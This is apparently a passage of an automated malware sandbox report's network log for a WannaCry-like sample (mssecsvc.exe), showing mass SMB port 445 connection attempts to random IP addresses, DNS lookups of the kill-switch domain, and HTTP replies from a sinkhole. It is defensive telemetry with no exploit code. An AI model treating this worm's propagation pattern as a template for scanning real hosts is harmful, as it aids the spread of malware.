                                                        Dec 22, 2022 10:08:14.253380060 CET62062445192.168.2.5157.35.0.143
                                                        Dec 22, 2022 10:08:14.253679991 CET62068445192.168.2.5100.179.25.127
                                                        Dec 22, 2022 10:08:14.253825903 CET62070445192.168.2.598.168.182.22
                                                        Dec 22, 2022 10:08:14.254030943 CET62074445192.168.2.5167.112.125.43
                                                        Dec 22, 2022 10:08:14.254141092 CET62075445192.168.2.585.39.113.65
                                                        Dec 22, 2022 10:08:14.254245043 CET62077445192.168.2.5152.30.87.242
                                                        Dec 22, 2022 10:08:14.254506111 CET62081445192.168.2.522.73.70.45
                                                        Dec 22, 2022 10:08:14.254548073 CET62082445192.168.2.523.252.83.104
                                                        Dec 22, 2022 10:08:14.254961967 CET62089445192.168.2.589.105.28.91
                                                        Dec 22, 2022 10:08:14.255059004 CET62090445192.168.2.5152.188.94.201
                                                        Dec 22, 2022 10:08:14.255106926 CET62091445192.168.2.578.129.49.66
                                                        Dec 22, 2022 10:08:14.255618095 CET62102445192.168.2.513.168.252.227
                                                        Dec 22, 2022 10:08:14.255712986 CET62104445192.168.2.5177.163.154.189
                                                        Dec 22, 2022 10:08:14.255842924 CET62105445192.168.2.5152.6.172.7
                                                        Dec 22, 2022 10:08:14.255846024 CET62106445192.168.2.585.143.56.83
                                                        Dec 22, 2022 10:08:14.256958008 CET62125445192.168.2.522.62.100.247
                                                        Dec 22, 2022 10:08:14.257116079 CET62126445192.168.2.578.99.159.68
                                                        Dec 22, 2022 10:08:14.257122040 CET62128445192.168.2.537.245.18.80
                                                        Dec 22, 2022 10:08:14.257517099 CET62137445192.168.2.575.105.160.10
                                                        Dec 22, 2022 10:08:14.257693052 CET62141445192.168.2.528.65.45.242
                                                        Dec 22, 2022 10:08:14.258130074 CET62151445192.168.2.5187.155.163.78
                                                        Dec 22, 2022 10:08:14.258133888 CET62152445192.168.2.5181.237.63.87
                                                        Dec 22, 2022 10:08:14.282785892 CET4456204638.35.118.29192.168.2.5
                                                        Dec 22, 2022 10:08:14.282906055 CET62046445192.168.2.538.35.118.29
                                                        Dec 22, 2022 10:08:14.454235077 CET4456204638.35.118.29192.168.2.5
                                                        Dec 22, 2022 10:08:14.518953085 CET62157445192.168.2.538.35.118.30
                                                        Dec 22, 2022 10:08:14.690735102 CET4456215738.35.118.30192.168.2.5
                                                        Dec 22, 2022 10:08:14.690939903 CET62157445192.168.2.538.35.118.30
                                                        Dec 22, 2022 10:08:14.690990925 CET62157445192.168.2.538.35.118.30
                                                        Dec 22, 2022 10:08:14.691438913 CET62158445192.168.2.538.35.118.30
                                                        Dec 22, 2022 10:08:14.846915960 CET62160445192.168.2.588.218.188.81
                                                        Dec 22, 2022 10:08:14.847197056 CET62161445192.168.2.541.203.13.146
                                                        Dec 22, 2022 10:08:14.862935066 CET4456215738.35.118.30192.168.2.5
                                                        Dec 22, 2022 10:08:14.862993956 CET4456215838.35.118.30192.168.2.5
                                                        Dec 22, 2022 10:08:14.863029957 CET4456215738.35.118.30192.168.2.5
                                                        Dec 22, 2022 10:08:14.863168001 CET62158445192.168.2.538.35.118.30
                                                        Dec 22, 2022 10:08:14.863236904 CET62158445192.168.2.538.35.118.30
                                                        Dec 22, 2022 10:08:14.897428036 CET4456216088.218.188.81192.168.2.5
                                                        Dec 22, 2022 10:08:15.034956932 CET4456215838.35.118.30192.168.2.5
                                                        Dec 22, 2022 10:08:15.037991047 CET62158445192.168.2.538.35.118.30
                                                        Dec 22, 2022 10:08:15.190460920 CET62164445192.168.2.5197.245.21.10
                                                        Dec 22, 2022 10:08:15.209893942 CET4456215838.35.118.30192.168.2.5
                                                        Dec 22, 2022 10:08:15.210524082 CET62158445192.168.2.538.35.118.30
                                                        Dec 22, 2022 10:08:15.362813950 CET62171445192.168.2.581.147.139.139
                                                        Dec 22, 2022 10:08:15.363173008 CET62175445192.168.2.559.58.238.33
                                                        Dec 22, 2022 10:08:15.363255978 CET62176445192.168.2.5166.155.179.196
                                                        Dec 22, 2022 10:08:15.363512039 CET62179445192.168.2.5115.57.242.206
                                                        Dec 22, 2022 10:08:15.363812923 CET62184445192.168.2.581.58.76.188
                                                        Dec 22, 2022 10:08:15.363893986 CET62186445192.168.2.589.132.190.60
                                                        Dec 22, 2022 10:08:15.364031076 CET62189445192.168.2.5136.251.95.125
                                                        Dec 22, 2022 10:08:15.364142895 CET62190445192.168.2.5165.250.102.43
                                                        Dec 22, 2022 10:08:15.364417076 CET62194445192.168.2.5115.122.30.3
                                                        Dec 22, 2022 10:08:15.364451885 CET62197445192.168.2.580.251.109.89
                                                        Dec 22, 2022 10:08:15.364602089 CET62201445192.168.2.512.236.158.168
                                                        Dec 22, 2022 10:08:15.364969969 CET62209445192.168.2.5113.33.71.140
                                                        Dec 22, 2022 10:08:15.365093946 CET62213445192.168.2.5121.100.105.65
                                                        Dec 22, 2022 10:08:15.365247965 CET62216445192.168.2.5199.24.65.34
                                                        Dec 22, 2022 10:08:15.365637064 CET62225445192.168.2.5125.106.131.77
                                                        Dec 22, 2022 10:08:15.365726948 CET62227445192.168.2.5141.196.10.57
                                                        Dec 22, 2022 10:08:15.366197109 CET62238445192.168.2.5140.180.15.149
                                                        Dec 22, 2022 10:08:15.366410017 CET62241445192.168.2.52.78.106.91
                                                        Dec 22, 2022 10:08:15.366415977 CET62242445192.168.2.51.39.93.182
                                                        Dec 22, 2022 10:08:15.367067099 CET62258445192.168.2.5109.26.115.122
                                                        Dec 22, 2022 10:08:15.367120981 CET62259445192.168.2.5150.199.158.141
                                                        Dec 22, 2022 10:08:15.367273092 CET62262445192.168.2.5146.239.55.252
                                                        Dec 22, 2022 10:08:15.367389917 CET62265445192.168.2.5169.81.126.113
                                                        Dec 22, 2022 10:08:15.382150888 CET4456215838.35.118.30192.168.2.5
                                                        Dec 22, 2022 10:08:15.408802032 CET61816445192.168.2.5142.219.19.8
                                                        Dec 22, 2022 10:08:15.410705090 CET62160445192.168.2.588.218.188.81
                                                        Dec 22, 2022 10:08:15.456583023 CET4456216088.218.188.81192.168.2.5
                                                        Dec 22, 2022 10:08:15.721349001 CET60214445192.168.2.584.7.167.4
                                                        Dec 22, 2022 10:08:15.909104109 CET62274445192.168.2.588.218.188.82
                                                        Dec 22, 2022 10:08:15.909280062 CET62275445192.168.2.541.203.13.147
                                                        Dec 22, 2022 10:08:15.957031012 CET4456227488.218.188.82192.168.2.5
                                                        Dec 22, 2022 10:08:16.049546003 CET61820445192.168.2.5142.219.19.8
                                                        Dec 22, 2022 10:08:16.462964058 CET62274445192.168.2.588.218.188.82
                                                        Dec 22, 2022 10:08:16.508538008 CET4456227488.218.188.82192.168.2.5
                                                        Dec 22, 2022 10:08:17.018364906 CET62274445192.168.2.588.218.188.82
                                                        Dec 22, 2022 10:08:17.039479971 CET44561816142.219.19.8192.168.2.5
                                                        Dec 22, 2022 10:08:17.039530993 CET44561816142.219.19.8192.168.2.5
                                                        Dec 22, 2022 10:08:17.039566040 CET44561816142.219.19.8192.168.2.5
                                                        Dec 22, 2022 10:08:17.064125061 CET4456227488.218.188.82192.168.2.5
                                                        Dec 22, 2022 10:08:17.282851934 CET44561820142.219.19.8192.168.2.5
                                                        Dec 22, 2022 10:08:17.282898903 CET44561820142.219.19.8192.168.2.5
                                                        Dec 22, 2022 10:08:17.282927036 CET44561820142.219.19.8192.168.2.5
                                                        Dec 22, 2022 10:08:17.330820084 CET61699445192.168.2.5155.100.133.5
                                                        Dec 22, 2022 10:08:17.659185886 CET61700445192.168.2.5155.100.133.5
                                                        Dec 22, 2022 10:08:18.199371099 CET62164445192.168.2.5197.245.21.10
                                                        Dec 22, 2022 10:08:18.377846003 CET62175445192.168.2.559.58.238.33
                                                        Dec 22, 2022 10:08:18.377846003 CET62227445192.168.2.5141.196.10.57
                                                        Dec 22, 2022 10:08:18.377852917 CET62225445192.168.2.5125.106.131.77
                                                        Dec 22, 2022 10:08:18.377871037 CET62241445192.168.2.52.78.106.91
                                                        Dec 22, 2022 10:08:18.377898932 CET62190445192.168.2.5165.250.102.43
                                                        Dec 22, 2022 10:08:18.377913952 CET62184445192.168.2.581.58.76.188
                                                        Dec 22, 2022 10:08:18.377943039 CET62179445192.168.2.5115.57.242.206
                                                        Dec 22, 2022 10:08:18.377940893 CET62238445192.168.2.5140.180.15.149
                                                        Dec 22, 2022 10:08:18.377943039 CET62197445192.168.2.580.251.109.89
                                                        Dec 22, 2022 10:08:18.377940893 CET62265445192.168.2.5169.81.126.113
                                                        Dec 22, 2022 10:08:18.377940893 CET62189445192.168.2.5136.251.95.125
                                                        Dec 22, 2022 10:08:18.377940893 CET62201445192.168.2.512.236.158.168
                                                        Dec 22, 2022 10:08:18.377940893 CET62209445192.168.2.5113.33.71.140
                                                        Dec 22, 2022 10:08:18.378021955 CET62242445192.168.2.51.39.93.182
                                                        Dec 22, 2022 10:08:18.378022909 CET62216445192.168.2.5199.24.65.34
                                                        Dec 22, 2022 10:08:18.378036022 CET62262445192.168.2.5146.239.55.252
                                                        Dec 22, 2022 10:08:18.378112078 CET62194445192.168.2.5115.122.30.3
                                                        Dec 22, 2022 10:08:18.378151894 CET62171445192.168.2.581.147.139.139
                                                        Dec 22, 2022 10:08:18.378175974 CET62213445192.168.2.5121.100.105.65
                                                        Dec 22, 2022 10:08:18.378180027 CET62186445192.168.2.589.132.190.60
                                                        Dec 22, 2022 10:08:18.378186941 CET62259445192.168.2.5150.199.158.141
                                                        Dec 22, 2022 10:08:18.378221989 CET62176445192.168.2.5166.155.179.196
                                                        Dec 22, 2022 10:08:18.378313065 CET62258445192.168.2.5109.26.115.122
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 22, 2022 10:04:11.399492979 CET4917753192.168.2.58.8.8.8
                                                        Dec 22, 2022 10:04:11.419634104 CET53491778.8.8.8192.168.2.5
                                                        Dec 22, 2022 10:04:12.766077995 CET4972453192.168.2.58.8.8.8
                                                        Dec 22, 2022 10:04:12.783776045 CET53497248.8.8.8192.168.2.5
                                                        Dec 22, 2022 10:04:14.774771929 CET6145253192.168.2.58.8.8.8
                                                        Dec 22, 2022 10:04:14.797605991 CET53614528.8.8.8192.168.2.5
                                                        Dec 22, 2022 10:05:03.051363945 CET138138192.168.2.5192.168.2.255
                                                        TimestampSource IPDest IPChecksumCodeType
                                                        Dec 22, 2022 10:04:30.528762102 CET91.52.180.166192.168.2.59dc5(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:04:38.098675013 CET209.201.109.2192.168.2.5ff87(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:04:41.450330019 CET31.214.150.160192.168.2.5aedb(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:04:41.460091114 CET5.56.18.166192.168.2.51650(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:04:46.693131924 CET5.56.18.166192.168.2.51fae(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:04:47.942806005 CET64.4.70.33192.168.2.5e98d(Time to live exceeded in transit)Time Exceeded
                                                        Dec 22, 2022 10:04:49.133745909 CET172.26.250.217192.168.2.5e1fc(Time to live exceeded in transit)Time Exceeded
                                                        Dec 22, 2022 10:04:49.789064884 CET38.122.123.218192.168.2.55bb8(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:05:04.756798029 CET145.145.20.174192.168.2.5e4dd(Net unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:05:05.882975101 CET109.250.38.109192.168.2.5580d(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:05:06.052356005 CET103.175.10.250192.168.2.52a22(Time to live exceeded in transit)Time Exceeded
                                                        Dec 22, 2022 10:05:10.154316902 CET108.175.114.66192.168.2.5b4d5(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:05:10.378864050 CET80.5.164.58192.168.2.544d(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:05:12.966080904 CET158.106.210.222192.168.2.56a68(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:05:13.428993940 CET95.80.4.227192.168.2.53981(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:05:14.033974886 CET62.94.25.185192.168.2.57c5d(Time to live exceeded in transit)Time Exceeded
                                                        Dec 22, 2022 10:05:15.762561083 CET10.202.116.2192.168.2.533b2(Time to live exceeded in transit)Time Exceeded
                                                        Dec 22, 2022 10:05:19.247826099 CET205.215.175.1192.168.2.51e2c(Time to live exceeded in transit)Time Exceeded
                                                        Dec 22, 2022 10:05:19.987941980 CET151.99.4.238192.168.2.56d3f(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:05:24.289117098 CET46.55.222.116192.168.2.5cbe5(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:05:28.313283920 CET178.15.97.182192.168.2.5bc48(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:05:29.358747959 CET103.206.205.253192.168.2.5ba89(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:05:31.639194965 CET217.245.45.172192.168.2.52df6(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:05:31.664453983 CET77.92.108.212192.168.2.5f57b(Time to live exceeded in transit)Time Exceeded
                                                        Dec 22, 2022 10:05:31.949481964 CET89.56.68.141192.168.2.5728e(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:05:33.285234928 CET49.255.202.10192.168.2.54f04(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:05:35.399002075 CET217.87.24.12192.168.2.5d02c(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:05:37.623202085 CET216.66.57.202192.168.2.58844(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:05:44.073100090 CET208.184.166.134192.168.2.53c6d(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:05:48.823714972 CET89.107.196.222192.168.2.5d92d(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:05:49.536726952 CET87.184.211.163192.168.2.5b1cb(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:05:50.958837032 CET172.19.3.129192.168.2.5471e(Time to live exceeded in transit)Time Exceeded
                                                        Dec 22, 2022 10:05:57.733550072 CET168.244.174.81192.168.2.59fa7(Time to live exceeded in transit)Time Exceeded
                                                        Dec 22, 2022 10:05:59.457443953 CET14.142.198.225192.168.2.59543(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:06:00.577414036 CET61.120.182.2192.168.2.5840d(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:06:05.284909964 CET62.252.173.250192.168.2.51edd(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:06:09.734829903 CET10.220.7.220192.168.2.5f73c(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:06:09.999013901 CET110.78.0.126192.168.2.5314d(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:06:12.645083904 CET158.205.83.66192.168.2.5871e(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:06:14.810661077 CET216.156.14.200192.168.2.52514(Time to live exceeded in transit)Time Exceeded
                                                        Dec 22, 2022 10:06:21.295079947 CET185.28.37.211192.168.2.5d6ac(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:06:25.694926023 CET90.155.53.63192.168.2.542b6(Net unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:06:26.819525003 CET5.226.136.11192.168.2.54c39(Time to live exceeded in transit)Time Exceeded
                                                        Dec 22, 2022 10:06:29.028419971 CET84.128.81.35192.168.2.5aa7c(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:06:30.190032005 CET93.105.91.178192.168.2.56a00(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:06:34.878736019 CET179.184.126.20192.168.2.5cbe4(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:06:35.650753021 CET45.178.70.1192.168.2.533bb(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:06:36.664776087 CET63.156.219.2192.168.2.5db47(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:06:38.010740042 CET88.75.173.196192.168.2.5ae30(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:06:38.622118950 CET41.203.13.82192.168.2.5f6e3(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:06:39.696877956 CET41.203.13.83192.168.2.5f6e4(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:06:40.354182005 CET216.66.76.214192.168.2.53ca8(Net unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:06:41.126020908 CET109.198.104.94192.168.2.59827(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:06:41.348356962 CET135.181.47.124192.168.2.57702(Port unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:06:43.642393112 CET38.140.149.33192.168.2.5edc2(Time to live exceeded in transit)Time Exceeded
                                                        Dec 22, 2022 10:06:45.844460964 CET193.95.1.222192.168.2.5a7e1(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:06:50.733807087 CET61.126.88.217192.168.2.5736b(Time to live exceeded in transit)Time Exceeded
                                                        Dec 22, 2022 10:06:51.504184961 CET65.186.177.36192.168.2.59d00(Port unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:06:52.717427015 CET172.22.0.30192.168.2.5255c(Net unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:06:54.731033087 CET149.11.89.129192.168.2.58c4(Net unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:07:00.345041037 CET79.219.1.244192.168.2.5198e(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:07:01.541755915 CET24.39.115.46192.168.2.5bb08(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:07:02.378290892 CET125.23.166.6192.168.2.56336(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:07:02.576167107 CET84.189.141.180192.168.2.5ed77(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:07:07.350358009 CET93.187.218.147192.168.2.549f4(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:07:12.154489040 CET85.136.151.223192.168.2.5263d(Port unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:07:14.749799013 CET223.196.94.6192.168.2.5fbfc(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:07:18.334271908 CET68.67.44.114192.168.2.5b5e8(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:07:19.451982975 CET24.104.66.133192.168.2.5f25c(Time to live exceeded in transit)Time Exceeded
                                                        Dec 22, 2022 10:07:21.328315973 CET160.119.148.14192.168.2.5f6e1(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:07:23.831103086 CET188.252.188.1192.168.2.566a9(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:07:25.108280897 CET207.87.255.82192.168.2.58bd0(Time to live exceeded in transit)Time Exceeded
                                                        Dec 22, 2022 10:07:27.199441910 CET185.31.199.21192.168.2.571aa(Time to live exceeded in transit)Time Exceeded
                                                        Dec 22, 2022 10:07:29.407011032 CET178.189.199.139192.168.2.5c59b(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:07:30.620301008 CET209.148.236.86192.168.2.5d7ac(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:07:31.851865053 CET36.92.250.70192.168.2.5b176(Time to live exceeded in transit)Time Exceeded
                                                        Dec 22, 2022 10:07:36.252105951 CET136.32.197.178192.168.2.5da4(Port unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:07:37.381247997 CET47.203.217.213192.168.2.5c967(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:07:42.133248091 CET123.100.144.33192.168.2.518bf(Time to live exceeded in transit)Time Exceeded
                                                        Dec 22, 2022 10:07:47.296181917 CET84.172.187.46192.168.2.525c(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:07:48.392013073 CET80.157.129.109192.168.2.5eed0(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:07:50.532551050 CET88.218.188.59192.168.2.5d4df(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:07:50.912544012 CET211.16.18.14192.168.2.5f8d(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:07:54.190197945 CET180.252.1.74192.168.2.59851(Time to live exceeded in transit)Time Exceeded
                                                        Dec 22, 2022 10:07:54.269476891 CET186.177.66.25192.168.2.57f36(Time to live exceeded in transit)Time Exceeded
                                                        Dec 22, 2022 10:07:57.733028889 CET103.71.228.41192.168.2.5b3b(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:08:03.755249977 CET172.31.1.150192.168.2.54b3e(Host unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:08:06.534682989 CET24.142.57.66192.168.2.57c45(Net unreachable)Destination Unreachable
                                                        Dec 22, 2022 10:08:09.814716101 CET82.2.246.218192.168.2.567b9(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:08:11.132142067 CET191.241.21.246192.168.2.5e164(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:08:11.158937931 CET220.233.209.6192.168.2.57648(Time to live exceeded in transit)Time Exceeded
                                                        Dec 22, 2022 10:08:12.052434921 CET90.186.160.151192.168.2.54aef(Unknown)Destination Unreachable
                                                        Dec 22, 2022 10:08:12.063051939 CET5.56.18.166192.168.2.52db9(Unknown)Destination Unreachable
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 22, 2022 10:04:11.399492979 CET192.168.2.58.8.8.80xde4cStandard query (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comA (IP address)IN (0x0001)false
                                                        Dec 22, 2022 10:04:12.766077995 CET192.168.2.58.8.8.80x2ea3Standard query (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comA (IP address)IN (0x0001)false
                                                        Dec 22, 2022 10:04:14.774771929 CET192.168.2.58.8.8.80xae69Standard query (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 22, 2022 10:04:11.419634104 CET8.8.8.8192.168.2.50xde4cNo error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.16.173.80A (IP address)IN (0x0001)false
                                                        Dec 22, 2022 10:04:11.419634104 CET8.8.8.8192.168.2.50xde4cNo error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.17.244.81A (IP address)IN (0x0001)false
                                                        Dec 22, 2022 10:04:12.783776045 CET8.8.8.8192.168.2.50x2ea3No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.16.173.80A (IP address)IN (0x0001)false
                                                        Dec 22, 2022 10:04:12.783776045 CET8.8.8.8192.168.2.50x2ea3No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.17.244.81A (IP address)IN (0x0001)false
                                                        Dec 22, 2022 10:04:14.797605991 CET8.8.8.8192.168.2.50xae69No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.17.244.81A (IP address)IN (0x0001)false
                                                        Dec 22, 2022 10:04:14.797605991 CET8.8.8.8192.168.2.50xae69No error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.16.173.80A (IP address)IN (0x0001)false
                                                        • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.55032120.90.156.32443C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.55040420.90.156.32443C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        10192.168.2.549705104.16.173.8080C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Dec 22, 2022 10:04:12.821734905 CET94OUTGET / HTTP/1.1
                                                        Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                                                        Cache-Control: no-cache


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        11104.16.173.8080192.168.2.549705C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Dec 22, 2022 10:04:12.892621040 CET95INHTTP/1.1 200 OK
                                                        Date: Thu, 22 Dec 2022 09:04:12 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 607
                                                        Connection: close
                                                        Server: cloudflare
                                                        CF-RAY: 77d7b0502e7f9007-FRA
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        12192.168.2.549729104.17.244.8180C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Dec 22, 2022 10:04:14.861583948 CET96OUTGET / HTTP/1.1
                                                        Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                                                        Cache-Control: no-cache


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        13104.17.244.8180192.168.2.549729C:\Windows\mssecsvc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Dec 22, 2022 10:04:14.898456097 CET96INHTTP/1.1 200 OK
                                                        Date: Thu, 22 Dec 2022 09:04:14 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 607
                                                        Connection: close
                                                        Server: cloudflare
                                                        CF-RAY: 77d7b05cea9d9164-FRA
